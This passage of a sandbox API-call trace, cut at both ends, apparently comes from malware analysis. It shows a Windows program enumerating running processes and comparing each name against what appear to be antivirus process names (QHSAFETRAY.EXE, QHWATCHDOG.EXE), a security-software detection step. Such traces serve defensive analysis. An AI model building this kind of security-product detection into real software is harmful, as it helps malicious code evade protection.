lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.019] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0163.019] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.019] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.019] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.019] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0163.020] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.020] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.020] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.020] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.020] lstrlenW (lpString="volume.exe") returned 10 [0163.020] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.020] lstrcmpW (lpString1="VOLUME.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0163.020] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0163.022] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | 
out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.022] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.022] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.022] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0163.022] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.024] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0163.024] lstrlenW (lpString="objectives-bailey-audit.exe") returned 27 [0163.024] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.024] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.024] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.025] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.025] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.025] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.025] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.025] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.026] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.026] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.026] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.026] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0163.026] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.027] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.027] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.027] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.027] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.027] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.027] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.027] lstrlenW (lpString="EXCEL.EXE") returned 9 [0163.027] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.028] 
lstrcmpW (lpString1="EXCEL.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.028] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.029] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.029] lstrlenW (lpString="svchost.exe") returned 11 [0163.029] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.029] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0163.029] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.030] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.030] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.030] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.030] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0163.030] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.030] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.030] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.030] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0163.030] lstrcmpW (lpString1="OSPPSVC.EXE", 
lpString2="QHSAFETRAY.EXE") returned -1 [0163.030] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.031] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.031] lstrlenW (lpString="svchost.exe") returned 11 [0163.031] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.031] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0163.038] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.039] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.039] lstrlenW (lpString="svchost.exe") returned 11 [0163.039] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.039] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0163.039] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.039] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.039] lstrlenW (lpString="winpoint.exe") returned 12 [0163.039] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0163.039] lstrcmpW (lpString1="WINPOINT.EXE", 
lpString2="QHSAFETRAY.EXE") returned 1 [0163.040] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.040] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.040] lstrlenW (lpString="cmd.exe") returned 7 [0163.040] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.040] lstrcmpW (lpString1="CMD.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.040] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.041] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.041] lstrlenW (lpString="conhost.exe") returned 11 [0163.041] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.041] lstrcmpW (lpString1="CONHOST.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.041] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.042] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.042] lstrlenW (lpString="PING.EXE") returned 8 [0163.042] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0163.042] lstrcmpW (lpString1="PING.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.042] Process32NextW (in: hSnapshot=0xe0, 
lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.042] CloseHandle (hObject=0xe0) returned 1 [0163.042] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0163.044] lstrcpyW (in: lpString1=0x18f8e4, lpString2="QHWATCHDOG.EXE" | out: lpString1="QHWATCHDOG.EXE") returned="QHWATCHDOG.EXE" [0163.044] lstrlenW (lpString="QHWATCHDOG.EXE") returned 14 [0163.044] CharUpperBuffW (in: lpsz="QHWATCHDOG.EXE", cchLength=0xe | out: lpsz="QHWATCHDOG.EXE") returned 0xe [0163.044] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.045] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0163.045] lstrlenW (lpString="[System Process]") returned 16 [0163.045] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0163.045] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="QHWATCHDOG.EXE") returned -1 [0163.045] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.046] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0163.046] lstrlenW (lpString="System") returned 6 [0163.046] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0163.046] lstrcmpW (lpString1="SYSTEM", lpString2="QHWATCHDOG.EXE") returned 1 [0163.046] 
Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.046] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0163.046] lstrlenW (lpString="smss.exe") returned 8 [0163.046] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0163.047] lstrcmpW (lpString1="SMSS.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.047] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.047] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.047] lstrlenW (lpString="csrss.exe") returned 9 [0163.047] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.047] lstrcmpW (lpString1="CSRSS.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.047] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.048] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.048] lstrlenW (lpString="wininit.exe") returned 11 [0163.048] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0163.048] lstrcmpW (lpString1="WININIT.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.048] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: 
lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.049] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.049] lstrlenW (lpString="csrss.exe") returned 9 [0163.049] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.049] lstrcmpW (lpString1="CSRSS.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.049] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.050] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.050] lstrlenW (lpString="winlogon.exe") returned 12 [0163.050] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0163.050] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.050] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.050] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.050] lstrlenW (lpString="services.exe") returned 12 [0163.050] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0163.050] lstrcmpW (lpString1="SERVICES.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.050] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.051] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.051] lstrlenW (lpString="lsass.exe") returned 9 [0163.051] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0163.051] lstrcmpW (lpString1="LSASS.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.051] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.052] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0163.052] lstrlenW (lpString="lsm.exe") returned 7 [0163.052] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0163.052] lstrcmpW (lpString1="LSM.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.052] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.052] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.052] lstrlenW (lpString="svchost.exe") returned 11 [0163.053] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.053] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.053] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.053] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.053] lstrlenW (lpString="svchost.exe") returned 11 [0163.053] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.053] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.053] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.054] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.054] lstrlenW (lpString="svchost.exe") returned 11 [0163.054] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.054] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.054] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.055] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.055] lstrlenW (lpString="svchost.exe") returned 11 [0163.055] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.055] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.055] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, 
th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.056] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.056] lstrlenW (lpString="svchost.exe") returned 11 [0163.056] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.056] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.056] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.057] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0163.057] lstrlenW (lpString="audiodg.exe") returned 11 [0163.057] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0163.057] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.057] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.057] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.057] lstrlenW (lpString="svchost.exe") returned 11 [0163.058] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.058] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.058] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.058] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.058] lstrlenW (lpString="svchost.exe") returned 11 [0163.058] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.058] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.058] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.059] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0163.059] lstrlenW (lpString="spoolsv.exe") returned 11 [0163.059] 